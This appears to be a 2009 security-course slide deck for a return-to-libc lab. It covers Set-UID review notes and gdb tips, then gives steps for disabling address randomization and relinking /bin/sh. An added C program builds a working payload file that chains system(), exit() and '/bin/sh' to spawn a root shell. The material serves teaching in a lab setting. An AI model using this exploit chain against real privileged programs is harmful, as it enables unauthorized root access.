Return-to-libc Lab Zutao Zhu 09/25/2009.

Outline
Review Set-UID assignment
Discussion of the Buffer-overflow Lab
Return-to-libc

Review Set-UID assignment
Capture the screen, please. You need to describe and explain the assignment in detail.
To prove that you have root privilege, a printf("This is my ls\n") is not enough.
"Make myprog a Set-UID root program, and run it in the root account."

Review Set-UID assignment
Refer to the lecture note: "To make sure Set-UID programs are safe from the manipulation of the LD_PRELOAD environment variable, the runtime linker/loader (ld.so) will ignore this environment variable if the program is a Set-UID root program, unless the real UID is also zero."

Buffer-overflow
Shellcode placed in a stack buffer executes from the lower memory address toward the higher one, like any other code, even though the stack itself grows toward lower addresses. Use "disassemble main" in gdb to see the order in which the instructions are laid out.

Buffer-overflow
Stack frame for stack.c: use "info frame" in gdb, and make sure you are stopped inside the function call you are interested in (set a breakpoint in that function and run to it); otherwise the frame gdb shows is the caller's, and the saved return address and frame pointer you read will be the wrong ones.

Return-to-libc
How do we get the addresses of system() and exit()? (Both are libc functions, not system calls, which is why a corrupted return address can be pointed at them.)
How do we expose a string such as "/bin/sh" in memory?
How do we get the exposed string's address?
How do we pass parameters to the functions we return into?

Return-to-libc
Step 1. Turn off address space randomization: /sbin/sysctl -w kernel.randomize_va_space=0
Step 2. Link /bin/sh to /bin/zsh (the default /bin/sh drops Set-UID root privileges when it starts; zsh does not).
Step 3. Expose "/bin/sh" in the memory of the target process (for example, through an environment variable).
Step 4. Use gdb to get the addresses of system() and exit().
Step 5. Get the address of the exposed "/bin/sh" string.
Step 6. Calculate the offset from the start of the vulnerable buffer to the saved return address.

Return-to-libc
Chain the libc calls together: after the filler that reaches the saved return address, place the address of system(), then the address of exit() (the victim's "ret" pops system() into EIP, so this slot is what system() sees as its own return address), then the address of "/bin/sh" (the slot system() reads as its first argument).

Return-to-libc
Once the shell starts, use "id" to check the current user information: the effective UID (euid) should be 0.
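The chain from Steps 4 to 6 and the previous slide, written out as an added example (this is not the lab's or the slides' own code). It assumes a 32-bit x86 target whose vulnerable program reads a 517-byte file into a stack buffer with a strcpy()-style copy, that the saved return address lies ret_offset bytes into that buffer, and that the addresses in main() are placeholders to be replaced with what gdb ("p system", "p exit") and an address-printing helper for the exported "/bin/sh" string report on the lab VM; the file name "badfile" is likewise an assumption.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of the file the vulnerable program copies into its stack buffer. */
#define PAYLOAD_SIZE 517

/* Write a 32-bit value at buf[off] in little-endian byte order (x86). */
static void put_le32(unsigned char *buf, size_t off, uint32_t v)
{
    buf[off]     = (unsigned char)(v & 0xffu);
    buf[off + 1] = (unsigned char)((v >> 8) & 0xffu);
    buf[off + 2] = (unsigned char)((v >> 16) & 0xffu);
    buf[off + 3] = (unsigned char)((v >> 24) & 0xffu);
}

/* Read a 32-bit little-endian value back from buf[off]; used to check the layout. */
uint32_t get_le32(const unsigned char *buf, size_t off)
{
    return (uint32_t)buf[off]
         | ((uint32_t)buf[off + 1] << 8)
         | ((uint32_t)buf[off + 2] << 16)
         | ((uint32_t)buf[off + 3] << 24);
}

/* Return 1 if any of the three addresses contains a 0x00 byte. A strcpy()-based
 * overflow stops at the first NUL, so such an address would truncate the chain. */
int chain_has_nul(uint32_t system_addr, uint32_t exit_addr, uint32_t sh_addr)
{
    uint32_t addrs[3] = { system_addr, exit_addr, sh_addr };
    for (int i = 0; i < 3; i++)
        for (int shift = 0; shift < 32; shift += 8)
            if (((addrs[i] >> shift) & 0xffu) == 0)
                return 1;
    return 0;
}

/* Lay out the return-to-libc chain inside buf.
 *
 *   buf[0 .. ret_offset)  filler, reaching the saved return address
 *   buf[ret_offset]       &system    -> loaded into EIP by the victim's "ret"
 *   buf[ret_offset + 4]   &exit      -> what system() sees as its return address
 *   buf[ret_offset + 8]   &"/bin/sh" -> what system() sees as its first argument
 *   buf[ret_offset + 12]  0x00       -> terminates the strcpy() that copies the chain
 *
 * Returns 0 on success, -1 if the chain does not fit in size bytes.
 */
int build_ret2libc_payload(unsigned char *buf, size_t size, size_t ret_offset,
                           uint32_t system_addr, uint32_t exit_addr, uint32_t sh_addr)
{
    if (ret_offset + 13 > size)
        return -1;
    memset(buf, 'A', size);            /* any non-NUL filler; nothing here is executed */
    put_le32(buf, ret_offset, system_addr);
    put_le32(buf, ret_offset + 4, exit_addr);
    put_le32(buf, ret_offset + 8, sh_addr);
    buf[ret_offset + 12] = 0;
    return 0;
}

int main(void)
{
    /* Placeholder values (assumed): replace with the addresses gdb and your
     * helper report on the lab VM, and with the offset computed in Step 6. */
    const uint32_t system_addr = 0xb7e5f430u;
    const uint32_t exit_addr   = 0xb7e52fb0u;
    const uint32_t sh_addr     = 0xbffffe5cu;
    const size_t   ret_offset  = 24;

    unsigned char payload[PAYLOAD_SIZE];
    if (chain_has_nul(system_addr, exit_addr, sh_addr)) {
        fprintf(stderr, "an address contains a NUL byte; strcpy() would cut the chain\n");
        return 1;
    }
    if (build_ret2libc_payload(payload, sizeof payload, ret_offset,
                               system_addr, exit_addr, sh_addr) != 0) {
        fprintf(stderr, "chain does not fit in the payload\n");
        return 1;
    }
    FILE *f = fopen("badfile", "wb");
    if (f == NULL) { perror("badfile"); return 1; }
    fwrite(payload, 1, sizeof payload, f);
    fclose(f);
    return 0;
}
```

The NUL check is the caveat worth keeping: with randomization off the libc addresses are stable, but if one of them happens to contain a zero byte the copy into the buffer stops early and the chain is never completed, which shows up as a crash rather than a shell. Note also that exit() is only there for a clean exit after the shell closes; the order system, exit, "/bin/sh" is fixed by how a 32-bit cdecl callee finds its return address and first argument on the stack.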

References
http://www.infosecwriters.com/text_resources/pdf/return-to-libc.pdf
http://milw0rm.org/papers/31

Questions?